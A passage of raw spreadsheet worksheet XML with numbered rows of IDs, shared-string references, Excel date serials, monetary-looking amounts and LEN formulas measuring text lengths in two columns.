        <v>0</v>
      </c>
      <c r="J850" t="s">
        <v>9538</v>
      </c>
      <c r="K850">
        <f>LEN(I850)</f>
        <v>0</v>
      </c>
      <c r="L850">
        <f>LEN(J850)</f>
        <v>13</v>
      </c>
    </row>
    <row r="851" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A851">
        <v>19975</v>
      </c>
      <c r="B851">
        <v>674</v>
      </c>
      <c r="C851" t="s">
        <v>588</v>
      </c>
      <c r="D851" t="s">
        <v>10363</v>
      </c>
      <c r="E851">
        <v>17</v>
      </c>
      <c r="F851" t="s">
        <v>10366</v>
      </c>
      <c r="G851" s="1">
        <v>43913</v>
      </c>
      <c r="H851">
        <v>0</v>
      </c>
      <c r="J851" t="s">
        <v>9538</v>
      </c>
      <c r="K851">
        <f>LEN(I851)</f>
        <v>0</v>
      </c>
      <c r="L851">
        <f>LEN(J851)</f>
        <v>13</v>
      </c>
    </row>
    <row r="852" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A852">
        <v>19976</v>
      </c>
      <c r="B852">
        <v>674</v>
      </c>
      <c r="C852" t="s">
        <v>16335</v>
      </c>
      <c r="D852" t="s">
        <v>16336</v>
      </c>
      <c r="E852">
        <v>17</v>
      </c>
      <c r="F852" t="s">
        <v>2236</v>
      </c>
      <c r="G852" s="1">
        <v>43913</v>
      </c>
      <c r="H852" s="4">
        <v>890481</v>
      </c>
      <c r="J852" t="s">
        <v>9538</v>
      </c>
      <c r="K852">
        <f>LEN(I852)</f>
        <v>0</v>
      </c>
      <c r="L852">
        <f>LEN(J852)</f>
        <v>13</v>
      </c>
    </row>
    <row r="853" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A853">
        <v>20221</v>
      </c>
      <c r="B853">
        <v>2609</v>
      </c>
      <c r="C853" t="s">
        <v>5768</v>
      </c>
      <c r="D853" t="s">
        <v>10560</v>
      </c>
      <c r="E853">
        <v>16</v>
      </c>
      <c r="F853" t="s">
        <v>10562</v>
      </c>
      <c r="G853" s="1">
        <v>43922</v>
      </c>
      <c r="H853">
        <v>10000</v>
      </c>
      <c r="J853" t="s">
        <v>9538</v>
      </c>
      <c r="K853">
        <f>LEN(I853)</f>
        <v>0</v>
      </c>
      <c r="L853">
        <f>LEN(J853)</f>
        <v>13</v>
      </c>
    </row>
    <row r="854" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A854">
        <v>20231</v>
      </c>
      <c r="B854">
        <v>1275</v>
      </c>
      <c r="C854" t="s">
        <v>2914</v>
      </c>
      <c r="D854" t="s">
        <v>10564</v>
      </c>
      <c r="E854">
        <v>26</v>
      </c>
      <c r="F854" t="s">
        <v>9849</v>
      </c>
      <c r="G854" s="1">
        <v>43914</v>
      </c>
      <c r="H854">
        <v>0</v>
      </c>
      <c r="J854" t="s">
        <v>9538</v>
      </c>
      <c r="K854">
        <f>LEN(I854)</f>
        <v>0</v>
      </c>
      <c r="L854">
        <f>LEN(J854)</f>
        <v>13</v>
      </c>
    </row>
    <row r="855" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A855">
        <v>20352</v>
      </c>
      <c r="B855">
        <v>899</v>
      </c>
      <c r="C855" t="s">
        <v>2943</v>
      </c>
      <c r="D855" t="s">
        <v>10644</v>
      </c>
      <c r="E855">
        <v>26</v>
      </c>
      <c r="F855" t="s">
        <v>10651</v>
      </c>
      <c r="G855" s="1">
        <v>44088</v>
      </c>
      <c r="H855">
        <v>0</v>
      </c>
      <c r="J855" t="s">
        <v>9538</v>
      </c>
      <c r="K855">
        <f>LEN(I855)</f>
        <v>0</v>
      </c>
      <c r="L855">
        <f>LEN(J855)</f>
        <v>13</v>
      </c>
    </row>
    <row r="856" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A856">
        <v>20382</v>
      </c>
      <c r="B856">
        <v>532</v>
      </c>
      <c r="C856" t="s">
        <v>982</v>
      </c>
      <c r="D856" t="s">
        <v>10675</v>
      </c>
      <c r="E856">
        <v>12</v>
      </c>
      <c r="F856" t="s">
        <v>9437</v>
      </c>
      <c r="G856" s="1">
        <v>43949</v>
      </c>
      <c r="H856">
        <v>10000</v>
      </c>
      <c r="J856" t="s">
        <v>9538</v>
      </c>
      <c r="K856">
        <f>LEN(I856)</f>
        <v>0</v>
      </c>
      <c r="L856">
        <f>LEN(J856)</f>
        <v>13</v>
      </c>
    </row>
    <row r="857" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A857">
        <v>20435</v>
      </c>
      <c r="B857">
        <v>2600</v>
      </c>
      <c r="C857" t="s">
        <v>4419</v>
      </c>
      <c r="D857" t="s">
        <v>10707</v>
      </c>
      <c r="E857">
        <v>14</v>
      </c>
      <c r="F857" t="s">
        <v>10712</v>
      </c>
      <c r="G857" s="1">
        <v>44299</v>
      </c>
      <c r="H857">
        <v>163596</v>
      </c>
      <c r="J857" t="s">
        <v>9538</v>
      </c>
      <c r="K857">
        <f>LEN(I857)</f>
        <v>0</v>
      </c>
      <c r="L857">
        <f>LEN(J857)</f>
        <v>13</v>
      </c>
    </row>
    <row r="858" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A858">
        <v>20575</v>
      </c>
      <c r="B858">
        <v>2719</v>
      </c>
      <c r="C858" t="s">
        <v>6860</v>
      </c>
      <c r="D858" t="s">
        <v>10823</v>
      </c>
      <c r="E858">
        <v>13</v>
      </c>
      <c r="F858" t="s">
        <v>10824</v>
      </c>
      <c r="G858" s="1">
        <v>44007</v>
      </c>
      <c r="H858">
        <v>26535</v>
      </c>
      <c r="J858" t="s">
        <v>9538</v>
      </c>
      <c r="K858">
        <f>LEN(I858)</f>
        <v>0</v>
      </c>
      <c r="L858">
        <f>LEN(J858)</f>
        <v>13</v>
      </c>
    </row>
    <row r="859" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A859">
        <v>20579</v>
      </c>
      <c r="B859">
        <v>2719</v>
      </c>
      <c r="C859" t="s">
        <v>6860</v>
      </c>
      <c r="D859" t="s">
        <v>10823</v>
      </c>
      <c r="E859">
        <v>13</v>
      </c>
      <c r="F859" t="s">
        <v>9444</v>
      </c>
      <c r="G859" s="1">
        <v>44007</v>
      </c>
      <c r="H859">
        <v>23479</v>
      </c>
      <c r="J859" t="s">
        <v>9538</v>
      </c>
      <c r="K859">
        <f>LEN(I859)</f>
        <v>0</v>
      </c>
      <c r="L859">
        <f>LEN(J859)</f>
        <v>13</v>
      </c>
    </row>
    <row r="860" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A860">
        <v>20667</v>
      </c>
      <c r="B860">
        <v>2759</v>
      </c>
      <c r="C860" t="s">
        <v>327</v>
      </c>
      <c r="D860" t="s">
        <v>10730</v>
      </c>
      <c r="E860">
        <v>29</v>
      </c>
      <c r="F860" t="s">
        <v>10875</v>
      </c>
      <c r="G860" s="1">
        <v>43930</v>
      </c>
      <c r="H860">
        <v>0</v>
      </c>
      <c r="J860" t="s">
        <v>9538</v>
      </c>
      <c r="K860">
        <f>LEN(I860)</f>
        <v>0</v>
      </c>
      <c r="L860">
        <f>LEN(J860)</f>
        <v>13</v>
      </c>
    </row>
    <row r="861" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A861">
        <v>20669</v>
      </c>
      <c r="B861">
        <v>2759</v>
      </c>
      <c r="C861" t="s">
        <v>327</v>
      </c>
      <c r="D861" t="s">
        <v>10730</v>
      </c>
      <c r="E861">
        <v>29</v>
      </c>
      <c r="F861" t="s">
        <v>10877</v>
      </c>
      <c r="G861" s="1">
        <v>43930</v>
      </c>
      <c r="H861">
        <v>0</v>
      </c>
      <c r="J861" t="s">
        <v>9538</v>
      </c>
      <c r="K861">
        <f>LEN(I861)</f>
        <v>0</v>
      </c>
      <c r="L861">
        <f>LEN(J861)</f>
        <v>13</v>
      </c>
    </row>
    <row r="862" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A862">
        <v>20675</v>
      </c>
      <c r="B862">
        <v>908</v>
      </c>
      <c r="C862" t="s">
        <v>2612</v>
      </c>
      <c r="D862" t="s">
        <v>9903</v>
      </c>
      <c r="E862">
        <v>10</v>
      </c>
      <c r="F862" t="s">
        <v>2407</v>
      </c>
      <c r="G862" s="1">
        <v>43997</v>
      </c>
      <c r="H862">
        <v>240</v>
      </c>
      <c r="J862" t="s">
        <v>9538</v>
      </c>
      <c r="K862">
        <f>LEN(I862)</f>
        <v>0</v>
      </c>
      <c r="L862">
        <f>LEN(J862)</f>
        <v>13</v>
      </c>
    </row>
    <row r="863" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A863">
        <v>20676</v>
      </c>
      <c r="B863">
        <v>908</v>
      </c>
      <c r="C863" t="s">
        <v>2612</v>
      </c>
      <c r="D863" t="s">
        <v>9903</v>
      </c>
      <c r="E863">
        <v>10</v>
      </c>
      <c r="F863" t="s">
        <v>10879</v>
      </c>
      <c r="G863" s="1">
        <v>43997</v>
      </c>
      <c r="H863">
        <v>520</v>
      </c>
      <c r="J863" t="s">
        <v>9538</v>
      </c>
      <c r="K863">
        <f>LEN(I863)</f>
        <v>0</v>
      </c>
      <c r="L863">
        <f>LEN(J863)</f>
        <v>13</v>
      </c>
    </row>
    <row r="864" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A864">
        <v>20769</v>
      </c>
      <c r="B864">
        <v>2798</v>
      </c>
      <c r="C864" t="s">
        <v>7012</v>
      </c>
      <c r="D864" t="s">
        <v>10968</v>
      </c>
      <c r="E864">
        <v>2</v>
      </c>
      <c r="F864" t="s">
        <v>2407</v>
      </c>
      <c r="G864" s="1">
        <v>43987</v>
      </c>
      <c r="H864">
        <v>500</v>
      </c>
      <c r="J864" t="s">
        <v>9538</v>
      </c>
      <c r="K864">
        <f>LEN(I864)</f>
        <v>0</v>
      </c>
      <c r="L864">
        <f>LEN(J864)</f>
        <v>13</v>
      </c>
    </row>
    <row r="865" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A865">
        <v>20818</v>
      </c>
      <c r="B865">
        <v>800</v>
      </c>
      <c r="C865" t="s">
        <v>1087</v>
      </c>
      <c r="D865" t="s">
        <v>11010</v>
      </c>
      <c r="E865">
        <v>16</v>
      </c>
      <c r="F865" t="s">
        <v>11011</v>
      </c>
      <c r="G865" s="1">
        <v>43977</v>
      </c>
      <c r="H865">
        <v>979491</v>
      </c>
      <c r="J865" t="s">
        <v>9538</v>
      </c>
      <c r="K865">
        <f>LEN(I865)</f>
        <v>0</v>
      </c>
      <c r="L865">
        <f>LEN(J865)</f>
        <v>13</v>
      </c>
    </row>
    <row r="866" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A866">
        <v>20819</v>
      </c>
      <c r="B866">
        <v>800</v>
      </c>
      <c r="C866" t="s">
        <v>1087</v>
      </c>
      <c r="D866" t="s">
        <v>11010</v>
      </c>
      <c r="E866">
        <v>16</v>
      </c>
      <c r="F866" t="s">
        <v>11012</v>
      </c>
      <c r="G866" s="1">
        <v>43977</v>
      </c>
      <c r="H866">
        <v>1469237</v>
      </c>
      <c r="J866" t="s">
        <v>9538</v>
      </c>
      <c r="K866">
        <f>LEN(I866)</f>
        <v>0</v>
      </c>
      <c r="L866">
        <f>LEN(J866)</f>
        <v>13</v>
      </c>
    </row>
    <row r="867" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A867">
        <v>20820</v>
      </c>
      <c r="B867">
        <v>800</v>
      </c>
      <c r="C867" t="s">
        <v>1087</v>
      </c>
      <c r="D867" t="s">
        <v>11010</v>
      </c>
      <c r="E867">
        <v>16</v>
      </c>
      <c r="F867" t="s">
        <v>11013</v>
      </c>
      <c r="G867" s="1">
        <v>43977</v>
      </c>
      <c r="H867">
        <v>119227</v>
      </c>
      <c r="J867" t="s">
        <v>9538</v>
      </c>
      <c r="K867">
        <f>LEN(I867)</f>
        <v>0</v>
      </c>
      <c r="L867">
        <f>LEN(J867)</f>
        <v>13</v>
      </c>
    </row>
    <row r="868" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A868">
        <v>20821</v>
      </c>
      <c r="B868">
        <v>800</v>
      </c>
      <c r="C868" t="s">
        <v>1087</v>
      </c>
      <c r="D868" t="s">
        <v>11010</v>
      </c>
      <c r="E868">
        <v>16</v>
      </c>
      <c r="F868" t="s">
        <v>2236</v>
      </c>
      <c r="G868" s="1">
        <v>43977</v>
      </c>
      <c r="H868">
        <v>34083</v>
      </c>
      <c r="J868" t="s">
        <v>9538</v>
      </c>
      <c r="K868">
        <f>LEN(I868)</f>
        <v>0</v>
      </c>
      <c r="L868">
        <f>LEN(J868)</f>
        <v>13</v>
      </c>
    </row>
    <row r="869" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A869">
        <v>20853</v>
      </c>
      <c r="B869">
        <v>2253</v>
      </c>
      <c r="C869" t="s">
        <v>2612</v>
      </c>
      <c r="D869" t="s">
        <v>9422</v>
      </c>
      <c r="E869">
        <v>16</v>
      </c>
      <c r="F869" t="s">
        <v>2236</v>
      </c>
      <c r="G869" s="1">
        <v>43977</v>
      </c>
      <c r="H869">
        <v>100000</v>
      </c>
      <c r="J869" t="s">
        <v>9538</v>
      </c>
      <c r="K869">
        <f>LEN(I869)</f>
        <v>0</v>
      </c>
      <c r="L869">
        <f>LEN(J869)</f>
        <v>13</v>
      </c>
    </row>
    <row r="870" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A870">
        <v>20889</v>
      </c>
      <c r="B870">
        <v>769</v>
      </c>
      <c r="C870" t="s">
        <v>16337</v>
      </c>
      <c r="D870" t="s">
        <v>16338</v>
      </c>
      <c r="E870">
        <v>16</v>
      </c>
      <c r="F870" t="s">
        <v>673</v>
      </c>
      <c r="G870" s="1">
        <v>44097</v>
      </c>
      <c r="H870">
        <v>4643685.5</v>
      </c>
      <c r="J870" t="s">
        <v>9538</v>
      </c>
      <c r="K870">
        <f>LEN(I870)</f>
        <v>0</v>
      </c>
      <c r="L870">
        <f>LEN(J870)</f>
        <v>13</v>
      </c>
    </row>
    <row r="871" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A871">
        <v>20890</v>
      </c>
      <c r="B871">
        <v>769</v>
      </c>
      <c r="C871" t="s">
        <v>16337</v>
      </c>
      <c r="D871" t="s">
        <v>16338</v>
      </c>
      <c r="E871">
        <v>16</v>
      </c>
      <c r="F871" t="s">
        <v>9441</v>
      </c>
      <c r="G871" s="1">
        <v>44097</v>
      </c>
      <c r="H871">
        <v>257690.4</v>
      </c>
      <c r="J871" t="s">
        <v>9538</v>
      </c>
      <c r="K871">
        <f>LEN(I871)</f>
        <v>0</v>
      </c>
      <c r="L871">
        <f>LEN(J871)</f>
        <v>13</v>
      </c>
    </row>
    <row r="872" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A872">
        <v>20912</v>
      </c>
      <c r="B872">
        <v>248</v>
      </c>
      <c r="C872" t="s">
        <v>1344</v>
      </c>
      <c r="D872" t="s">
        <v>9669</v>
      </c>
      <c r="E872">
        <v>16</v>
      </c>
      <c r="F872" t="s">
        <v>2407</v>
      </c>
      <c r="G872" s="1">
        <v>43966</v>
      </c>
      <c r="H872">
        <v>500000</v>
      </c>
      <c r="J872" t="s">
        <v>9538</v>
      </c>
      <c r="K872">
        <f>LEN(I872)</f>
        <v>0</v>
      </c>
      <c r="L872">
        <f>LEN(J872)</f>
        <v>13</v>
      </c>
    </row>
    <row r="873" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A873">
        <v>21018</v>
      </c>
      <c r="B873">
        <v>621</v>
      </c>
      <c r="C873" t="s">
        <v>1409</v>
      </c>
      <c r="D873" t="s">
        <v>11099</v>
      </c>
      <c r="E873">
        <v>16</v>
      </c>
      <c r="F873" t="s">
        <v>673</v>
      </c>
      <c r="G873" s="1">
        <v>44067</v>
      </c>
      <c r="H873">
        <v>507000</v>
      </c>
      <c r="J873" t="s">
        <v>9538</v>
      </c>
      <c r="K873">
        <f>LEN(I873)</f>
        <v>0</v>
      </c>
      <c r="L873">
        <f>LEN(J873)</f>
        <v>13</v>
      </c>
    </row>
    <row r="874" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A874">
        <v>21019</v>
      </c>
      <c r="B874">
        <v>621</v>
      </c>
      <c r="C874" t="s">
        <v>1409</v>
      </c>
      <c r="D874" t="s">
        <v>11099</v>
      </c>
      <c r="E874">
        <v>16</v>
      </c>
      <c r="F874" t="s">
        <v>9441</v>
      </c>
      <c r="G874" s="1">
        <v>44067</v>
      </c>
      <c r="H874">
        <v>973000</v>
      </c>
      <c r="J874" t="s">
        <v>9538</v>
      </c>
      <c r="K874">
        <f>LEN(I874)</f>
        <v>0</v>
      </c>
      <c r="L874">
        <f>LEN(J874)</f>
        <v>13</v>
      </c>
    </row>
    <row r="875" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A875">
        <v>21062</v>
      </c>
      <c r="B875">
        <v>908</v>
      </c>
      <c r="C875" t="s">
        <v>2612</v>
      </c>
      <c r="D875" t="s">
        <v>9903</v>
      </c>
      <c r="E875">
        <v>10</v>
      </c>
      <c r="F875" t="s">
        <v>10478</v>
      </c>
      <c r="G875" s="1">
        <v>43997</v>
      </c>
      <c r="H875">
        <v>30000</v>
      </c>
      <c r="J875" t="s">
        <v>9538</v>
      </c>
      <c r="K875">
        <f>LEN(I875)</f>
        <v>0</v>
      </c>
      <c r="L875">
        <f>LEN(J875)</f>
        <v>13</v>
      </c>
    </row>
    <row r="876" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A876">
        <v>21091</v>
      </c>
      <c r="B876">
        <v>604</v>
      </c>
      <c r="C876" t="s">
        <v>1503</v>
      </c>
      <c r="D876" t="s">
        <v>11132</v>
      </c>
      <c r="E876">
        <v>27</v>
      </c>
      <c r="F876" t="s">
        <v>9900</v>
      </c>
      <c r="G876" s="1">
        <v>44005</v>
      </c>
      <c r="H876">
        <v>564000</v>
      </c>
      <c r="J876" t="s">
        <v>9538</v>
      </c>
      <c r="K876">
        <f>LEN(I876)</f>
        <v>0</v>
      </c>
      <c r="L876">
        <f>LEN(J876)</f>
        <v>13</v>
      </c>
    </row>
    <row r="877" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A877">
        <v>21174</v>
      </c>
      <c r="B877">
        <v>743</v>
      </c>
      <c r="C877" t="s">
        <v>905</v>
      </c>
      <c r="D877" t="s">
        <v>11186</v>
      </c>
      <c r="E877">
        <v>16</v>
      </c>
      <c r="F877" t="s">
        <v>11187</v>
      </c>
      <c r="G877" s="1">
        <v>44159</v>
      </c>
      <c r="H877">
        <v>54000</v>
      </c>
      <c r="J877" t="s">
        <v>9538</v>
      </c>
      <c r="K877">
        <f>LEN(I877)</f>
        <v>0</v>
      </c>
      <c r="L877">
        <f>LEN(J877)</f>
        <v>13</v>
      </c>
    </row>
    <row r="878" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A878">
        <v>21366</v>
      </c>
      <c r="B878">
        <v>4779</v>
      </c>
      <c r="C878" t="s">
        <v>5933</v>
      </c>
      <c r="D878" t="s">
        <v>11333</v>
      </c>
      <c r="E878">
        <v>16</v>
      </c>
      <c r="F878" t="s">
        <v>385</v>
      </c>
      <c r="G878" s="1">
        <v>44049</v>
      </c>
      <c r="H878">
        <v>300000</v>
      </c>
      <c r="J878" t="s">
        <v>9538</v>
      </c>
      <c r="K878">
        <f>LEN(I878)</f>
        <v>0</v>
      </c>
      <c r="L878">
        <f>LEN(J878)</f>
        <v>13</v>
      </c>
    </row>
    <row r="879" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A879">
        <v>20685</v>
      </c>
      <c r="B879">
        <v>489</v>
      </c>
      <c r="C879" t="s">
        <v>1176</v>
      </c>
      <c r="D879" t="s">
        <v>10884</v>
      </c>
      <c r="E879">
        <v>13</v>
      </c>
      <c r="F879" t="s">
        <v>7746</v>
      </c>
      <c r="G879" s="1">
        <v>44070</v>
      </c>
      <c r="H879">
        <v>27600</v>
      </c>
      <c r="I879" t="s">
        <v>10885</v>
      </c>
      <c r="J879" t="s">
        <v>9713</v>
      </c>
      <c r="K879">
        <f>LEN(I879)</f>
        <v>207</v>
      </c>
      <c r="L879">
        <f>LEN(J879)</f>
        <v>12</v>
      </c>
    </row>
    <row r="880" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A880">
        <v>19554</v>
      </c>
      <c r="B880">
        <v>2282</v>
      </c>
      <c r="C880" t="s">
        <v>5182</v>
      </c>
      <c r="D880" t="s">
        <v>10093</v>
      </c>
      <c r="E880">
        <v>2</v>
      </c>
      <c r="F880" t="s">
        <v>10095</v>
      </c>
      <c r="G880" s="1">
        <v>43861</v>
      </c>
      <c r="H880">
        <v>120000</v>
      </c>
      <c r="I880" t="s">
        <v>10096</v>
      </c>
      <c r="J880" t="s">
        <v>10018</v>
      </c>
      <c r="K880">
        <f>LEN(I880)</f>
        <v>128</v>
      </c>
      <c r="L880">
        <f>LEN(J880)</f>
        <v>12</v>
      </c>
    </row>
    <row r="881" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A881">
        <v>19412</v>
      </c>
      <c r="B881">
        <v>1178</v>
      </c>
      <c r="C881" t="s">
        <v>2668</v>
      </c>
      <c r="D881" t="s">
        <v>10013</v>
      </c>
      <c r="E881">
        <v>26</v>
      </c>
      <c r="F881" t="s">
        <v>10016</v>
      </c>
      <c r="G881" s="1">
        <v>43875</v>
      </c>
      <c r="H881">
        <v>50000</v>
      </c>
      <c r="I881" t="s">
        <v>10017</v>
      </c>
      <c r="J881" t="s">
        <v>10018</v>
      </c>
      <c r="K881">
        <f>LEN(I881)</f>
        <v>40</v>
      </c>
      <c r="L881">
        <f>LEN(J881)</f>
        <v>12</v>
      </c>
    </row>
    <row r="882" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A882">
        <v>20366</v>
      </c>
      <c r="B882">
        <v>509</v>
      </c>
      <c r="C882" t="s">
        <v>932</v>
      </c>
      <c r="D882" t="s">
        <v>10653</v>
      </c>
      <c r="E882">
        <v>26</v>
      </c>
      <c r="F882" t="s">
        <v>3814</v>
      </c>
      <c r="G882" s="1">
        <v>43906</v>
      </c>
      <c r="H882">
        <v>15000</v>
      </c>
      <c r="I882" t="s">
        <v>9693</v>
      </c>
      <c r="J882" t="s">
        <v>9713</v>
      </c>
      <c r="K882">
        <f>LEN(I882)</f>
        <v>33</v>
      </c>
      <c r="L882">
        <f>LEN(J882)</f>
        <v>12</v>
      </c>
    </row>
    <row r="883" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A883">
        <v>17177</v>
      </c>
      <c r="B883">
        <v>2267</v>
      </c>
      <c r="C883" t="s">
        <v>6309</v>
      </c>
      <c r="D883" t="s">
        <v>9707</v>
      </c>
      <c r="E883">
        <v>18</v>
      </c>
      <c r="F883" t="s">
        <v>9716</v>
      </c>
      <c r="G883" s="1">
        <v>43903</v>
      </c>
      <c r="H883">
        <v>50000</v>
      </c>
      <c r="I883" t="s">
        <v>9711</v>
      </c>
      <c r="J883" t="s">
        <v>9713</v>
      </c>
      <c r="K883">
        <f>LEN(I883)</f>
        <v>22</v>
      </c>
      <c r="L883">
        <f>LEN(J883)</f>
        <v>12</v>
      </c>
    </row>
    <row r="884" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A884">
        <v>20572</v>
      </c>
      <c r="B884">
        <v>2769</v>
      </c>
      <c r="C884" t="s">
        <v>6962</v>
      </c>
      <c r="D884" t="s">
        <v>10816</v>
      </c>
      <c r="E884">
        <v>25</v>
      </c>
      <c r="F884" t="s">
        <v>2236</v>
      </c>
      <c r="G884" s="1">
        <v>43959</v>
      </c>
      <c r="H884">
        <v>0</v>
      </c>
      <c r="I884" t="s">
        <v>9536</v>
      </c>
      <c r="J884" t="s">
        <v>9713</v>
      </c>
      <c r="K884">
        <f>LEN(I884)</f>
        <v>13</v>
      </c>
      <c r="L884">
        <f>LEN(J884)</f>
        <v>12</v>
      </c>
    </row>
    <row r="885" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A885">
        <v>20573</v>
      </c>
      <c r="B885">
        <v>2769</v>
      </c>
      <c r="C885" t="s">
        <v>6962</v>
      </c>
      <c r="D885" t="s">
        <v>10816</v>
      </c>
      <c r="E885">
        <v>25</v>
      </c>
      <c r="F885" t="s">
        <v>6917</v>
      </c>
      <c r="G885" s="1">
        <v>43959</v>
      </c>
      <c r="H885">
        <v>0</v>
      </c>
      <c r="I885" t="s">
        <v>9536</v>
      </c>
      <c r="J885" t="s">
        <v>9713</v>
      </c>
      <c r="K885">
        <f>LEN(I885)</f>
        <v>13</v>
      </c>
      <c r="L885">
        <f>LEN(J885)</f>
        <v>12</v>
      </c>
    </row>
    <row r="886" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A886">
        <v>17174</v>
      </c>
      <c r="B886">
        <v>2267</v>
      </c>
      <c r="C886" t="s">
        <v>6309</v>
      </c>
      <c r="D886" t="s">
        <v>9707</v>
      </c>
      <c r="E886">
        <v>18</v>
      </c>
      <c r="F886" t="s">
        <v>7241</v>
      </c>
      <c r="G886" s="1">
        <v>43901</v>
      </c>
      <c r="H886">
        <v>5000</v>
      </c>
      <c r="J886" t="s">
        <v>9713</v>
      </c>
      <c r="K886">
        <f>LEN(I886)</f>
        <v>0</v>
      </c>
      <c r="L886">
        <f>LEN(J886)</f>
        <v>12</v>
      </c>
    </row>
    <row r="887" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A887">
        <v>17175</v>
      </c>
      <c r="B887">
        <v>2267</v>
      </c>
      <c r="C887" t="s">
        <v>6309</v>
      </c>
      <c r="D887" t="s">
        <v>9707</v>
      </c>
      <c r="E887">
        <v>18</v>
      </c>
      <c r="F887" t="s">
        <v>9437</v>
      </c>
      <c r="G887" s="1">
        <v>43901</v>
      </c>
      <c r="H887">
        <v>5000</v>
      </c>
      <c r="J887" t="s">
        <v>9713</v>
      </c>
      <c r="K887">
        <f>LEN(I887)</f>
        <v>0</v>
      </c>
      <c r="L887">
        <f>LEN(J887)</f>
        <v>12</v>
      </c>
    </row>
    <row r="888" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A888">
        <v>20154</v>
      </c>
      <c r="B888">
        <v>2362</v>
      </c>
      <c r="C888" t="s">
        <v>4825</v>
      </c>
      <c r="D888" t="s">
        <v>9886</v>
      </c>
      <c r="E888">
        <v>16</v>
      </c>
      <c r="F888" t="s">
        <v>10514</v>
      </c>
      <c r="G888" s="1">
        <v>43878</v>
      </c>
      <c r="H888">
        <v>30000</v>
      </c>
      <c r="J888" t="s">
        <v>9713</v>
      </c>
      <c r="K888">
        <f>LEN(I888)</f>
        <v>0</v>
      </c>
      <c r="L888">
        <f>LEN(J888)</f>
        <v>12</v>
      </c>
    </row>
    <row r="889" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A889">
        <v>20359</v>
      </c>
      <c r="B889">
        <v>509</v>
      </c>
      <c r="C889" t="s">
        <v>932</v>
      </c>
      <c r="D889" t="s">
        <v>10653</v>
      </c>
      <c r="E889">
        <v>26</v>
      </c>
      <c r="F889" t="s">
        <v>1746</v>
      </c>
      <c r="G889" s="1">
        <v>43906</v>
      </c>
      <c r="H889">
        <v>100000</v>
      </c>
      <c r="J889" t="s">
        <v>9713</v>
      </c>
      <c r="K889">
        <f>LEN(I889)</f>
        <v>0</v>
      </c>
      <c r="L889">
        <f>LEN(J889)</f>
        <v>12</v>
      </c>
    </row>
    <row r="890" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A890">
        <v>17267</v>
      </c>
      <c r="B890">
        <v>1980</v>
      </c>
      <c r="C890" t="s">
        <v>6111</v>
      </c>
      <c r="D890" t="s">
        <v>9750</v>
      </c>
      <c r="E890">
        <v>16</v>
      </c>
      <c r="F890" t="s">
        <v>3673</v>
      </c>
      <c r="G890" s="1">
        <v>44194</v>
      </c>
      <c r="H890">
        <v>800000</v>
      </c>
      <c r="I890" t="s">
        <v>9751</v>
      </c>
      <c r="J890" t="s">
        <v>9752</v>
      </c>
      <c r="K890">
        <f>LEN(I890)</f>
        <v>64</v>
      </c>
      <c r="L890">
        <f>LEN(J890)</f>
        <v>11</v>
      </c>
    </row>
    <row r="891" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A891">
        <v>17268</v>
      </c>
      <c r="B891">
        <v>1980</v>
      </c>
      <c r="C891" t="s">
        <v>6111</v>
      </c>
      <c r="D891" t="s">
        <v>9750</v>
      </c>
      <c r="E891">
        <v>16</v>
      </c>
      <c r="F891" t="s">
        <v>6569</v>
      </c>
      <c r="G891" s="1">
        <v>44194</v>
      </c>
      <c r="H891">
        <v>1300000</v>
      </c>
      <c r="I891" t="s">
        <v>9751</v>
      </c>
      <c r="J891" t="s">
        <v>9752</v>
      </c>
      <c r="K891">
        <f>LEN(I891)</f>
        <v>64</v>
      </c>
      <c r="L891">
        <f>LEN(J891)</f>
        <v>11</v>
      </c>
    </row>
    <row r="892" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A892">
        <v>20619</v>
      </c>
      <c r="B892">
        <v>2102</v>
      </c>
      <c r="C892" t="s">
        <v>5966</v>
      </c>
      <c r="D892" t="s">
        <v>10849</v>
      </c>
      <c r="E892">
        <v>19</v>
      </c>
      <c r="F892" t="s">
        <v>10850</v>
      </c>
      <c r="G892" s="1">
        <v>43970</v>
      </c>
      <c r="H892">
        <v>43500</v>
      </c>
      <c r="I892" t="s">
        <v>9536</v>
      </c>
      <c r="J892" t="s">
        <v>10469</v>
      </c>
      <c r="K892">
        <f>LEN(I892)</f>
        <v>13</v>
      </c>
      <c r="L892">
        <f>LEN(J892)</f>
        <v>11</v>
      </c>
    </row>
    <row r="893" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A893">
        <v>20620</v>
      </c>
      <c r="B893">
        <v>2102</v>
      </c>
      <c r="C893" t="s">
